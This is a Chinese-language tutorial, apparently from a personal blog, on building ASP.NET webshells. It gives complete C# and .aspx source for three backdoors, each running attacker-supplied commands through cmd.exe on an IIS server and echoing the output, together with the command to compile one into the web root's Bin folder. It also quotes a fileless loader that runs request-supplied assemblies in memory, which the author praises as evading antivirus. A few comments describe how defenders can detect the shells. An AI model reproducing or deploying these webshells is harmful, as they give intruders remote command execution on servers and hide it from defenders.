asp.net学习之路--c#asp.net小马

先写一个小马

using System;
using System.Web;
using System.IO;
using System.Diagnostics;
using System.Net;

namespace Recmdy
{
    /// <summary>
    /// Constructor-only "small shell": everything happens when the hosting page instantiates the class.
    /// The unvalidated request value "a" is appended verbatim to "cmd.exe /c", the process's stdout is
    /// captured, and the text is written back into the response inside a &lt;pre&gt; block.
    /// Detection note: the observable artifact is the IIS worker process (w3wp.exe) spawning cmd.exe
    /// with a request-controlled command line; only stdout is redirected, so stderr never reaches the
    /// response.
    /// </summary>
    public partial class Recmd
    {
        public Recmd()
        {
            // Command text comes straight from the request with no validation or encoding.
            string cmdx = HttpContext.Current.Request["a"];
            Process oci = new Process();
            oci.StartInfo.FileName = "c:\\windows\\system32\\cmd.exe";
            oci.StartInfo.RedirectStandardOutput = true;
            oci.StartInfo.UseShellExecute = false;// redirect the IO stream (required for RedirectStandardOutput)
            oci.StartInfo.Arguments = "/c"+ cmdx;
            oci.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            oci.Start();
            StreamReader txt = oci.StandardOutput;
            string alltxt = txt.ReadToEnd();
            txt.Close();
            txt.Dispose();// release resources
            // Raw stdout is echoed without HTML encoding.
            HttpContext.Current.Response.Write("<pre>" + alltxt + "</pre>");

        }
    }
}

然后编译

C:\Windows\Microsoft.NET\Framework64\v4.0.30319>csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\Recmd.dll C:\inetpub\wwwroot\1.aspx.cs

然后在 1.aspx 中调用

<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="Recmdy" %>
<%-- ValidateRequest="false" disables ASP.NET request validation for this page, so values containing markup-like characters are not rejected before Recmd reads them. --%>
<script runat="server">
    // Field initializer: Recmd's constructor (which runs the command) executes as soon as the page
    // class is instantiated, before any page lifecycle event.
    Recmd recmd = new Recmd();
</script>

插曲：我很好奇地看了一下以前大佬们写的客户端是怎么实现的

<%@ Page Language="C#" ValidateRequest="false" %>
<%-- Reads the raw request body (byte count taken from cookie "a"), loads those bytes as an in-memory assembly and instantiates its type "c", passing the page instance as the constructor argument. Nothing is written to disk, and the empty catch hides any failure from the response. Detection note: Assembly.Load of request-supplied bytes inside the IIS worker process is the observable behaviour here. --%>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["a"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

分析了一波，是把本地 dll 读出来然后以 byte 的形式传给 web 服务器，这样的 webshell 理论上是完全免杀的

接下来我们来继续构造单个webshe.aspx

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<script runat="server">
    /// <summary>
    /// Button handler wired from the form markup (onclick="Recmd"): feeds the text of the "recmdc"
    /// box to cmd.exe over stdin and echoes the captured stdout into the response inside a
    /// &lt;pre&gt; block.
    /// Detection note: the IIS worker process (w3wp.exe) spawning cmd.exe and writing a
    /// request-controlled line to its stdin is the observable artifact; StandardError is redirected
    /// but never read, so errors stay out of the response.
    /// </summary>
    /// <param name="sender">The button that raised the click.</param>
    /// <param name="e">Event arguments (unused).</param>
    protected void Recmd(object sender, EventArgs e)
    {
        string item = recmdc.Text;
        Process p = new Process();
        p.StartInfo.FileName = "c:\\windows\\system32\\cmd.exe"; // absolute path, in case cmd.exe is not on PATH
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardInput = true;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.StartInfo.CreateNoWindow = true;
        string strOutput = null;
        p.Start();
        p.StandardInput.WriteLine(item);// pass in the command via stdin rather than the argument list
        p.StandardInput.WriteLine("exit");
        strOutput = p.StandardOutput.ReadToEnd();
        p.WaitForExit();
        p.Close();
        p.Dispose();
        // Raw stdout is written without HTML encoding.
        Response.Write("<pre>");
        Response.Write(strOutput);
        Response.Write("</pre>");
    }
    /// <summary>
    /// Intentionally empty: the page does nothing on load; all work happens in the Recmd
    /// click handler on postback.
    /// </summary>
    /// <param name="sender">The page raising the event.</param>
    /// <param name="e">Event arguments (unused).</param>
    protected void Page_Load(object sender, EventArgs e)
    {
    }
</script>
<form id="form1" runat="server">
<asp:TextBox id="recmdc" runat="server" Text="whoami"/><asp:Button id="bt1" onclick="Recmd" runat="server" Text="exec" />
</form>

 
